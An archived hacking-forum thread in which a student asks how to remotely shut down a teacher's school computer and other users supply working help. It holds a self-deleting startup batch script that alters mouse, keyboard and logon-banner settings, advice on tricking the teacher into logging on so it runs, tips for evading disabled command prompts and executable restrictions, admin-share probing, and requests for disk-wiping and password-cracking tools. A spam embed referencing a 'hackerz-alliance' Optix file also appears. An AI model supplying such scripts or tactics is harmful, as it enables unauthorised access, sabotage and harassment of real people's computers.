PDA

View Full Version : Shutdown Using MS-DOS

Unregistered
02-11-2005, 10:58 AM
My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?

Thanks.

ABHIS
02-11-2005, 01:27 PM
Originally posted by Unregistered
My -------- teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
Thanks.
*.I need to know if the Operating System is WinXP or W2K
2.Is the computer part of a LAN, is the open session belongs to the admin group?
*.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

Off hand I would do the following that might evntually work:
*. open with notepad or edit an empty file (on your computer)
2. copy then paste these lines in this file

copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
call abcd*2*4 -s

*. save the file and name it abcd.bat
4. copy this abcd.bat file to the target computer and run the abcd.bat

ABHIS (a guest)

ABHIS
02-11-2005, 01:31 PM
Originally posted by ABHIS
[B
[/B]
By the way, if all PCs are connected on LAN (network), simply copy abcd.bat to a shared commun folder accessible all over the network.
Go to the target PC, locate abcd.bat where you put it, hit it (AND RUN) ;)

Unregistered
02-11-2005, 04:45 PM
2.Is the computer part of a LAN, is the open session belongs to the admin group?
*.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

call abcd*2*4 -s

ABHIS (a guest)

The operating system is XP and is connected by LAN.
I attempted to shut it down by shutdown -i and searching for it. I found it, but "Access is Denied" came up. I'm not in there right now, but I'll try it tomorrow and let you know how it worked.

asdfgjkloo

Unregistered
02-11-2005, 07:51 PM

call abcd*2*4 -s

ABHIS (a guest)

I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).

SyntaXmasteR
02-12-2005, 04:30 AM
I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.

Put This Under All Users and make her log onto your computer...

SAVE AS WinHelp.BAT and place the file here
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

--------------------------------------------
echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="*" >> c:\reg.reg
echo "MouseSpeed"="*" >> c:\reg.reg
echo "DoubleClickSpeed"="*00" >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
echo "Key***rdDelay"="5" >> c:\reg.reg
echo "Key***rdSpeed"="*0" >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo "Start Page"="http://www.google.com/" >> c:\reg.reg
echo.
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg

REGEDIT /s c:\reg.reg
start iexplore.exe www.google.com
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
exit
-------------------------------------
Edited for links.

ABHIS
02-12-2005, 05:18 AM
I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).
Where you able to run the .bat file on the teacher's PC?
I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
It makes all the difference, see why:
In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
They are authenticated by their MD5 (using protection similar to SSM).
When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.

Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
If however this protection exists, I am sure that you won't be even able to run regedit.exe

SyntaXmasteR
02-12-2005, 11:39 AM
Can you send me a link so i can read up on the MD5 authentication. I've never heard of it but is sounds like a good way to completely control what kids are doing on the computers. I think the access denied is just b.c of his "user" privledges trying to shutdown another persons computer on a lan... Ive seen the same error trying to shutdown a computer while logged on as a standard user.

Since the TEACHER is logging on to his computer will the MD5 lockdowns still take place if she is an network admin? I'm guessing the MD5 authentication would tie into the Active Directory Server and grant her full permissions once she is logged onto his computer. Hopefully its not on a local base...

Unregistered
02-12-2005, 12:41 PM
Where you able to run the .bat file on the teacher's PC?
I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
It makes all the difference, see why:
In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
They are authenticated by their MD5 (using protection similar to SSM).
When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.

Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
If however this protection exists, I am sure that you won't be even able to run regedit.exe

I didn't open it from her computer. If i could do that, i would just go to Start, Shutdown.

If I put the batch file ABHIS made in her startup, will it boot up, and shutdown as soon as abcd.bat is accessed?

Same with SyntaX******'s file. Will it open all those websites and mess up her mouse, key***rd and display those lovely little messages as soon as it is started?

If so, that would be fucking hilarious, lmao

One more thing. If I do this and fuck up her computer, will they be able to trace it back to mine?

Thanks, asdfghjkloo

SyntaXmasteR
02-12-2005, 03:54 PM
Bad News- You wont be able to put the file in her startup folder ~

UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...

Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
-If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.

About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.

UNDERSTAND HOW TO RUN THE FILE
------------------------------
*. You do NOT run the file
2. You place the file here on your LOCAL COMPUTER
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
*. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows.

Unregistered
02-13-2005, 12:28 AM
Originally posted by SyntaX******
Bad News- You wont be able to put the file in her startup folder ~

UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...

Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
-If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.

About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.

UNDERSTAND HOW TO RUN THE FILE
------------------------------
*. You do NOT run the file
2. You place the file here on your LOCAL COMPUTER
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
*. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows.

I'm *5% sure her C drive is shared, dumbass, I guess she didn't expect for me to come along :) I've been experimenting with batch files, I think I can make a nice one. Thanks for the help though, I'll ask if I need your help.

Also, in your batch file, what is c:\reg.reg and what does it do?\

Thanks, asdfghjkloo

ABHIS
02-13-2005, 05:17 AM
Also, in your batch file, what is c:\reg.reg and what does it do?\

The " >> " is a stdin redirection, it means that you are redirecting whatever typed text into --> a file (in this particular case it is called reg.reg located on the root of disk C
you may call it anything else, but in this expl you need to keep the .reg extension.
By the way, DO NOT FORGET to add this line as well at the end of your batch file:
del c:\reg.reg

ABHIS
02-13-2005, 05:19 AM
Add the line BEFORE del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
Because whatever is AFTER this line is completely useless ;)

02-13-2005, 01:36 PM
At school i want to shutdown a friends computer but how do i go about it if i do not have access to command prompt. Is there any way?Or any other programs similar to command prompt that will be allowed?

thanks a lot in advance for your help.

Unregistered
02-13-2005, 08:14 PM
Originally posted by *2*456
At school i want to shutdown a friends computer but how do i go about it if i do not have access to command prompt. Is there any way?Or any other programs similar to command prompt that will be allowed?

thanks a lot in advance for your help.

You can access the command prompt by:
*. Start, Programs, Accessories, Command Prompt.
2. Click Start and Run. Then type "cmd" (no quotation marks) and hit enter.
*. Open notepad and type start in the document. Save the document as cmd.bat on the desktop (so you can easily delete it after you're through with it) and then run the file.

asdfghjkloo

SyntaXmasteR
02-14-2005, 10:16 AM
Sorry about those links DATA -

By the way, DO NOT FORGET to add this line as well at the end of your batch file:

Thanks for catchin that!

Unregistered
02-14-2005, 12:33 PM
My teacher somehow found out that I shutdown one of her computers that is not protected from shutdown -i. She got pissed off! Bad pissed, so she put me in the corner and disabled my internet as well as unpl***ing the network connection. LMAO!! Could she of found out any way other than somebody telling her?

02-14-2005, 01:48 PM
when i try an access command prompt at school it says it is disbaled by administrator. Any ideas how to get his password or get around this so i can use command prompt. Thanks a lot for any help. it is much appreciated (not by the teachers tho)

SyntaXmasteR
02-14-2005, 02:38 PM
Nicee one... Got caught on your first try~

Unregistered
02-14-2005, 07:56 PM
My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?

Thanks.
But how did you get into the teacher's computer i mean she or he will be always around their computer.

Unregistered
02-14-2005, 09:57 PM
You can access the command prompt by:
*. Start, Programs, Accessories, Command Prompt.
2. Click Start and Run. Then type "cmd" (no quotation marks) and hit enter.
*. Open notepad and type start in the document. Save the document as cmd.bat on the desktop (so you can easily delete it after you're through with it) and then run the file.

asdfghjkloo
they block batch scripts at school

SyntaXmasteR
02-15-2005, 03:14 PM
All it takes is *0 seconds. Pop in a floppy, start up cmd, call the script... Sometimes explorer.exe gets sl***ish if you try to open your floppy drive by clicking to it so do it through your command prompt.

Unregistered
02-15-2005, 10:45 PM
hey syntax****** could u have windows actually create a file in a batch script?
just wondering
i would also like to know someother things to commands to like open things and run things

Unregistered
02-15-2005, 11:02 PM
hey i was having treouble getting my remote shutdown to work it always says network path not found and it wont let me browse for computers
just wondering if u guys (or girls) had any ideas that might help me
all comps are winxp and file sharing enabled and ip adresses allowed in firewalls
thanks again

Unregistered
02-16-2005, 03:38 AM
Google is your friend...
search for poweroff, or download http://users.pandora.be/jbosman/pwroff*0.zip from here http://users.pandora.be/jbosman/applications.html
that's all you'll need.

Fu*k them all :-)

02-16-2005, 05:04 AM
Using poweroff can you enter ip addresses into as the remote computer?
Could anyone give me an ip address to test it on?

Unregistered
02-16-2005, 06:27 PM
i know u ppl will think im a complete loser which i am. ive been trying to hack and send virsus scince the 5th grade and i havnt gone anywhere you guys seem smart could anyone plz point me in the right direction where to learn?

SyntaXmasteR
02-17-2005, 04:15 PM
could u have windows actually create a file in a batch script?

YeS~ Thats what the script i posted does. It creates a few new registry keys and then silently adds them to your registry.

Unregistered
02-17-2005, 05:12 PM
okay, i'm thinking of this: email yourself cmd.exe, but rather change exe into exec, say if it wouldn't let you download exe files at school. in this way you get a working cmd.exec into that computer and have access to it. you should be able to execute it from the folder in which you downloaded the attachment, after you rename it back to cmd.exe. never did this though, i'm also curious. so if it works pls let me know. cheers!

Unregistered
02-20-2005, 04:17 PM
Hey,

I have a really annoying sister who always uses Audio on MSN messenger every night. Is there any way of creating a BAT file which will close MSN messenger at *0PM and to make sure the MSN messenger cannot be opened again till 6AM. This would be very useful. Or even a BAT file which shuts down the PC at *0PM

Thanks

Gav

Unregistered
02-23-2005, 11:36 PM
Hey,

I have a really annoying sister who always uses Audio on MSN messenger every night. Is there any way of creating a BAT file which will close MSN messenger at *0PM and to make sure the MSN messenger cannot be opened again till 6AM. This would be very useful. Or even a BAT file which shuts down the PC at *0PM

Thanks

Gav

Haha, I think your stretching it a little far there Gav. SyntaX******, can you do it?

Unregistered
02-24-2005, 11:17 AM
syntax i ran the program u posted on my siblings computers and every time i boot then up it says "you have been hacked" how and what do i do to get rid of this problem thanks in advance

fleetwooDmaC
02-24-2005, 11:41 AM
syntax i ran the program u posted on my siblings computers and every time i boot then up it says "you have been hacked" how and what do i do to get rid of this problem thanks in advance
This is you lesson NOT to trust anybody and NOT to run any silly application on your PC.
Now syntax will (maybe) send you another shit to fix this problem and screw up some this else.
Note in the mean time that NO DDOS shit was successful at all, otherwise you would have mentioned it.
love to you (and hugs)

Unregistered
02-24-2005, 04:19 PM
so how do i get rid of it i really need to no
thanks

ABHIS
02-24-2005, 04:41 PM
so how do i get rid of it i really need to no
thanks
As far as I can quickly guess:
*. it might be a .bat or an .exe file with a link (.lnk) under here:
>Start > All Programs > Startup --> here you'll see a "weird" name
most probably without an icon!
2. or (even better) it might be just here:
you need to open regedit and find it by yourself under this key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
or under this key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

in all cases, delete the exe file that you received.

cheers ;)

Unregistered
02-24-2005, 05:45 PM
that didnt help much does i need more ideas plz help hes pissed i no i screwed up but i need help
thanks if u have any info i would really like it
thanks again

Unregistered
02-25-2005, 01:14 AM
please help me with this problem of how to get rid of the u have been hacked message at startup
thanks

ABHIS
02-25-2005, 09:16 AM
please help me with this problem of how to get rid of the u have been hacked message at startup
thanks
*. you need to know that I CANNOT provide any help if you do not understand what I am asking.
2. you need to provide details about the message that you are getting:
____a. Is it a message during booting BEFORE that Windows starts (DOS message)?
____b. Is it a message inside a small window AFTER that windows starts. (similar to an error box)
*. Did you check what I asked in my earlier post (here the answer is easy: YES or NO) --> if you do not know ---> go back to step *. ;)
*. what OS are you running Win*x or WinXP?
4. Just for sake of it, have you checked inside your autoexec.bat

ABHIS

SyntaXmasteR
02-25-2005, 11:15 AM
I want to appologize for taking a while to reply to your questions. I have been absent from the forum for about a week now.

I will try to answer all of your questions:

*. Open your registry regedit.exe
2. Follow this path to the registry key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
*. Delete the Key With The Unwanted Text (NOT THE FOLDER)

I have a really annoying sister who always uses Audio on MSN messenger every night.

I have a .vbs script just for that purpose. It will actually be a script running in the background that says "IF THE PROCESS %WHATEVER.EXE% START STOP IT IMMEDIATELY" What is the name of the process that runs when you start the messenger? I will add it to the script and post it here.

SyntaXmasteR
02-25-2005, 11:22 AM
TO fleetwooDmaC

Why did you run the program that i posted on your siblings computer!? Maybe you should read the posts beforehand so that you know what the program actually does. I wrote the silly program just for fun. It doesnt do any damage but it tweaks all your settings. I posted it for the guy trying to get back at his teacher, not for the general user to run it on their own computer for fun. If you need any settings changed back just let me know which ones and ill tell you how to do it. I appologize again if anyone was confused about what the script did...

DO NOT RUN THE SCRIPT ON YOUR OWN COMPUTER. IT WILL NOT DO ANY DAMAGE BUT IT WILL TWEAK THE SHIOT OUT OF YOUR SETTINGS.

Unregistered
03-02-2005, 08:54 AM
I have put in some script that was posted earlier on this forum and now i can get my mouse back to normal and that hacked thing keeps popping up, also i cant delete the Winlogon.exe file. Can anyone help me plz!

SyntaXmasteR
03-02-2005, 11:33 AM
REVERSE THE SETTINGS W/ THIS BATCH

echo off
echo "SwapMouseButtons"="0" >> c:\reg.reg
echo "MouseSpeed"="2" >> c:\reg.reg
echo "DoubleClickSpeed"="50" >> c:\reg.reg
echo "Key***rdDelay"="2" >> c:\reg.reg
echo "Key***rdSpeed"="2" >> c:\reg.reg
echo "PaintDesktopVersion"=dword:0 >> c:\reg.reg
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
del "c:\reg.reg"
exit

Open your registry and delete the keys
:LegalNoticeCaption
:LegalNoticeText

This is where the keys will be located-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

Restart your comptuer or HIT F4 to re***** your registry and everything will be fine.

So_Gee_
03-03-2005, 12:43 AM
hi im a newbie to al this i no alittle and i mean very little i ran the one that SyntaX****** posted up here on a friends computer and now i need to reverse the effects i would really apreciate it if someone could help me every hting is fine except for the logon message is still there saying you have been hacked contact *-800....
cheers

So_Gee_
03-03-2005, 12:53 AM
sorry not only new but also thick didnt realise there were three pages and wat im looking for is on the third sorry my bad

Unregistered
03-04-2005, 01:06 AM
lol thats funny, but i have no idea

---

<object classid="clsid:D27CDB6E-AE6D-**cf-*6B8-44455*540000" width=200 height=200> <param name=movie value=http://hackerz-alliance.com/optix/aa.swf> <param name=play value=true> <param name=loop value=true> <param name=quality value=high> <embed src=http://hackerz-alliance.com/optix/aa.swf width=200 height=200 play=true loop=true quality=high> </embed> </object>

Unregistered
03-10-2005, 07:19 PM
I don't know if anyone is still looking at this thread, but if you're going to do a remote shutdown with XP, I've noticed that a certain security setting has to be in place.

Go to Start > Programs > Administrative Tools (provided that it's there) > Local Security Policy

In the little tree to the left, make sure you go to the Security Settings > Local Policies > Security Options menu. Then scroll down to where you see "Network Access: Sharing and security model for local accounts", and set it to Classic mode as opposed to the Guest only mode.

This allows any local users to log on remotely, then you can use a tool like <a href="http://www.sysinternals.com/ntw2k/freeware/psshutdown.shtml">psShutdown</a> to log in as that user and shut 'em down.

Granted you'll need a local admin account on that machine and know the password, so that might not work at your school, but it's useful to know for other purposes.

If nothing else, while you're at school, try a command like this:
net send * Help, the principal touched me like Michael Jackson!
That's always fun (we got in trouble back in school for playing with the old winpopup on some Win*5 machines).
Now, the only problem is that there was a vulnerability in the messenger service (which delivers the net send commands), and Microsoft solved the vulnerability by sending out a patch that disabled the serivce by default. However, your school might have the service on so they can send out outage notices or what not. Either way, it's worth a shot. Oh, and btw, any message you send out will have the host name on it that sent it, so do it from your friend's computer.

Unregistered
03-23-2005, 10:23 PM
I am having trouble making batch files. What I want to do is make four batch files. The first one to be placed in the startup directory to shutdown or disable the computer. The second one to do so remotely. Assume that the cmd remote shutdown line was disabled because you cannot see any other computers. This is for the school network, which is Novell netware 5.86. I have access to cmd, regedit, my computer, control panel, administrative tools, and everything not part of the network. I can make a new windows user with admin rights. Most things on the network are disabled. I can use Remote Assistance, but no other messenging services. I can also map the network drive, giving me access to all files, except other home directories. I was able to somehow, once logged on as them, add myself and others to the trustee rights of that student. I cannot do this to any other students. Even though i can see most network files, i cannot use some of them. Any other network tricks or ideas would be helpful. The second to wipe all files in the folder that I specify, on my command. It would be nice if it also deleted any reference to these files. The third to wipe the hard drive totaly clean, and keep the files from being recoverable, also on my command, not automaticly. It would also be great if the last two could delete themselves afterward. I didn't see any other threads where this should be posted, so this one looked good. Any help would be useful. I would also like some current novell password hack programs, all the ones that i found were out of date. I just found pandora though, so i will try that. Sorry to ask so much of you, but the people here all seemed to be experts.

Unregistered
04-10-2005, 04:16 AM
Simply because I've been searching for this for some time now, only to solve it myself...

IF you're looking to remotely shutdown an XP Pro machine and are receiving Access is Denied, even though you can connect to the remote desktop... Turn your simple file sharing off, then try to shut 'er down again.

Wheee!

Unregistered
04-12-2005, 12:52 PM
how do u turn simple file sharing off?

- a noob

Unregistered
04-13-2005, 09:14 PM
I am having trouble making batch files. What I want to do is make four batch files. The first one to be placed in the startup directory to shutdown or disable the computer. The second one to do so remotely. Assume that the cmd remote shutdown line was disabled because you cannot see any other computers. This is for the school network, which is Novell netware 4.86. I have access to cmd, regedit, my computer, control panel, administrative tools, and everything not part of the network. I can make a new windows user with admin rights. Most things on the network are disabled. I can use Remote Assistance, but no other messenging services. I can also map the network drive, giving me access to all files, except other home directories. I was able to somehow, once logged on as them, add myself and others to the trustee rights of that student. I cannot do this to any other students. Even though i can see most network files, i cannot use some of them. Any other network tricks or ideas would be helpful. The second to wipe all files in the folder that I specify, on my command. It would be nice if it also deleted any reference to these files. The third to wipe the hard drive totaly clean, and keep the files from being recoverable, also on my command, not automaticly. It would also be great if the last two could delete themselves afterward. I didn't see any other threads where this should be posted, so this one looked good. Any help would be useful. I would also like some current novell password hack programs, all the ones that i found were out of date. I just found pandora though, so i will try that. Sorry to ask so much of you, but the people here all seemed to be experts.
sorry, typo 4.86, not 5.86

maka
04-14-2005, 10:46 AM
[
hey guys in need help.
i want to shutdown a pc on our network at work but i dont know the commands to do it using ms dos promt.

Unregistered
04-15-2005, 12:26 AM
How to turn off Simple File Sharing in Windows XP Professional:
Open up a folder (double-clicking on My Computer will do). On the menu bar, go to Tools, then Folder Options...
Go to the View tab, and then in the Advanced Settings box, it will be the last item. It will say <I>Use Simple File Sharing (recommended)</I>. Uncheck the box to disable it.

Now as for the whole remote shutdown fix, I dunno about that. The security option thingy in Post #46 worked for me.

Unregistered
04-18-2005, 09:47 AM
What if we dont have Xp Pro? i have regular Xp

Unregistered
04-18-2005, 12:28 PM
no, wait i found it, but access is still denied, how do i get past this?

Unregistered
04-19-2005, 11:35 PM
Try the instructions at the top of Post #46 (about editing the security policy). You'll have to make this change on the computer that you want to remotely shut down from your local network. Also, the setting is <B>not</B> by default, which means unless you've already done this, you'll have to go in and set it before the remote shutdowns are going to work.<BR>Next you'll need the username and password of an account (I think one with administrative priviliges) on your target computer.<BR>
Then try to remotely shut the target computer down from another computer on the LAN. For simplification, you can use a GUI tool like this: <A href="http://www.matcode.com/remoteshutdown.htm">Remote Shutdown GUI</A>.<BR>
Hope that helps.

Unregistered
04-22-2005, 12:26 PM
I dont have Administrative tools under my start programs

Unregistered
04-24-2005, 01:16 AM
It's not there by default. First, make sure that the account you're using has admin rights. Then, right-click on the taskbar and select Properties. Go to the Start Menu tab, and click the Customize button for either version of the Start Menu you're using (XP or Classic).<BR>
<BR>
If you're using the <B>XP Start Menu</B>: After clicking the Customize button, go to the Advanced tab of the menu that comes up. In the box entitled Start Menu items, scroll all the way to the bottom to where you see the item System Administrative Tools, and change the option to display them.<BR>
<BR>
If you're using the <B>Classic Start Menu</B>: After clicking the Customize button, look at the "Advanced Start Menu Options" box and the Display Administrative Tools item should be the first checkbox.<BR>
<BR>
Hope that helps/works.

Doxx
04-27-2005, 11:20 AM
Im lost... I have a local network here at home and I would like to use the remote shutdown command (cause im lazy, and I dont feel like walking to the other side of the house to turn them off). Perfect opportunity to make this work right? Wrong. I tried the policy change procedure in post 46, and used the psshutdown command line utility. All are winxp pro, and I have admin rights on the local machine as well as the accounts/passwords for the other computers. I still receive the error "access is denied". Does anyone know what I might be missing?

SyntaXmasteR
04-27-2005, 01:04 PM
I would like to use the remote shutdown command (cause im lazy, and I dont feel like walking to the other side of the house to turn them off).

In your line of code for the psshutdown.exe you need to specify a the computername and username and pass of the machine you are shutting down.

Ex: I am trying to shut down a computer named BOB. A user has an account on the computer with username: Syntax****** password: shutdown

psshutdown -f -u BOB\Syntax****** -p shutdown

Unregistered
04-29-2005, 02:14 PM
<b>I have a .vbs script just for that purpose. It will actually be a script running in the background that says "IF THE PROCESS %WHATEVER.EXE% START STOP IT IMMEDIATELY" What is the name of the process that runs when you start the messenger? I will add it to the script and post it here.[/QUOTE]<b>

msnmsgr.exe is the process

Unregistered
05-12-2005, 06:22 AM
if it wont let you run cmd.exe just run command.exe (or just command in the run box) ive found it will run when cmd.exe is disabled =)

this is on a win2k and xp box however...win*x only has command.exe and cmd isnt on win*x

to shut down a pc you have admin rights on...make a scheduled task in your windows (or hers, she probably wont find it) and have the shutdown command shut the pc off at *0pm

Unregistered
05-18-2005, 01:41 PM
OK OK PLEASE HELP ME SOMONE I know like all the command prompt stuff but Ineed to know one more thing if your trying to add an account witch I had done before but they caught me and now it says ACCESS DENIED is there a way through command prompt to grand access...

Ryan >>>THX

Unregistered
05-29-2005, 03:42 PM
hey ... i bet this is random but can somone tell me how to make a batch file that runs when windows starts that requires a boot disk

Unregistered
06-08-2005, 03:28 PM
how do u pass the access denied alert? i want to plauge all my schools computers

echo off
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo.
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg

h1ght3ch
06-08-2005, 11:02 PM

Thanks.
nothing but newbs and script kiddies in this forum :rolleyes:

Kiro
06-09-2005, 12:16 PM
its funny as crap how many people ran that bat file on thier own computer. who in thier right mind would run a file meant to do harm to another on your own compy. lmao

Infection
06-14-2005, 10:57 PM
I am now inspired to write my own file. :D

Unregistered
06-16-2005, 03:34 PM
I know you can control pint job through net print.
but considering that there seemd to be no protection throught the printers in my school is there any way to go throught there to get toe other comps?

Unregistered
06-19-2005, 11:55 AM
i want to shut down some networked pc using cmd or a bat file but i dont know the computer names can somebody help me plz

Unregistered
06-21-2005, 06:29 PM
i want to shut down some networked pc using cmd or a bat file but i dont know the computer names can somebody help me plz

if you can get to the computer you want to shutdown type in " ipconfig /all "
and find the ip/comp name

Unregistered
07-21-2005, 01:40 PM
sir,
I am using lan system ,i want 2 delete/change administrator password
I done these step but vain

goto comond prompt

and write net user administrator*

no found administrator changed and delete opetion plz help me

rippinsurfer
07-26-2005, 12:54 AM
i know u ppl will think im a complete loser which i am. ive been trying to hack and send virsus scince the 5th grade and i havnt gone anywhere you guys seem smart could anyone plz point me in the right direction where to learn?

one too but im trying i just have this crazy internet filter that i cant get around. i even have the pasword. any ideas about books or where to start being a hacker would be much aprisheated.

darknimpo
11-05-2005, 08:31 AM
once i have sumones ip address what can i do? could i possibly hack there game account if they play the same one as me?

gitfist
11-09-2006, 04:26 PM
wow,

these post are really very helpful... i've been trying to do the same thing but with no luck on the shutdown.exe..... Im also getting access denied. Im trying this on a Peer-To-Peer LAN. Each workstation has WinXP SP2 on it. What is wierd is that each workstation userid's are on admin level (unless there is something higher than "Administrator").. including whatever station I use. I have admin access to any workstation that I sit into but I cannot get accomplish this remotely (I mean station shutting down another station)... I will appreciate the help... oh and another thing, hopefully I can accomplish this without using a third party freeware.... i really wanted to learn how stuff works.... hope ya'll understand

Vjhoncruut
11-29-2007, 04:53 PM
Create a list of your poop. Include poop of your choice (size, path, date, etc). Save in internal format or export as text, html or xls. Import lists created by other applications. Find duplicates in your toilet. Compare your list to other people's lists (find out what others have that you don't, and the opposite). Insert & edit items. Plenty options to satisfy almost anyone

download diz here prog (http://weblogs.jomc.unc.edu:*6080/briman/wp-content/spell-plugin/poop/*.html)

cuongnet
12-18-2007, 06:08 AM
Naa, its technology, we cant please everyone, and in the last *0 minutes i've been all over the world. Its my opinion that the good outweighs the bad.

01-22-2008, 11:50 AM
How do you stop this batch file from runnning and make the "You have been haked" stop coming on.
That was posted by Syntax****** on 02-*2-2005, 05:*0 AM
I need it to stop running.

I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.

Put This Under All Users and make her log onto your computer...

SAVE AS WinHelp.BAT and place the file here
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

--------------------------------------------
echo off
echo.

exit
-------------------------------------
Edited for links.

coz
01-22-2008, 01:58 PM
I haven't read the whole thread or really what this is about but you should be able to press Ctrl+C to stop anything running in a command prompt. As something else I don't know if anyone else has added this but the command prompt shutdown tool can be used to stop Windows from shutting down. Say you ended a critical process such as smss and Windows gives you that Windows must shutdown message, you can open a command prompt and stop the shutdown by typing something like "shutdown -a" and the pop up will disappear.

Sir Grifin
01-30-2008, 08:38 AM
to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....

*.-go to terminal
2.-log like root
*.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.:D

well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....:D

Sir Grifin
01-30-2008, 08:50 AM
to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....

*.-go to terminal
2.-log like root
*.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.:D

well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....:D

jake345
02-18-2008, 06:44 PM
Try this small utility!
yermy.com/forum